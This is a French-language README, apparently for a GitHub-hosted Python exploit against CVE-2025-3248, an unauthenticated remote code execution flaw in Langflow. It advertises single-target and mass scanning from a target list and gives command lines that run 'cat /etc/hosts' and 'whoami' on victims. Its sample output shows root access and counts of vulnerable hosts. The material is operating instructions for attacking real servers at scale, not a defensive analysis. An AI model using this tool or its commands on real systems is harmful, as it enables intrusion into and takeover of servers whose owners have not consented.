
Exploit basé sur Python pour CVE-2025-3248 permettant l'exécution de code à distance sur des instances Langflow vulnérables. Prend en charge l'analyse d'URL unique et le balayage en masse avec détection automatique des vulnérabilités et exécution de commandes.
Un exploit basé sur Python pour CVE-2025-3248, permettant à des attaquants distants et non authentifiés d'exécuter du code arbitraire sur des instances Langflow vulnérables via des requêtes HTTP malveillantes.
python CVE-2025-3248.py http://target-url -c "cat /etc/hosts"
python CVE-2025-3248.py -f targets.txt
python CVE-2025-3248.py -f targets.txt -c "whoami"
[*] Progress: 1/10 URLs checked
[*] Checking https://example.com
[+] Vulnerable - Command Output:
uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------
[*] Scan Summary:
[+] Total URLs checked: 10
[+] Vulnerable URLs: 3
[+] Not Vulnerable URLs: 7
[*] Total scan time: 25.34s
[*] Results saved to files with timestamp
source: https://github.com/verylazytech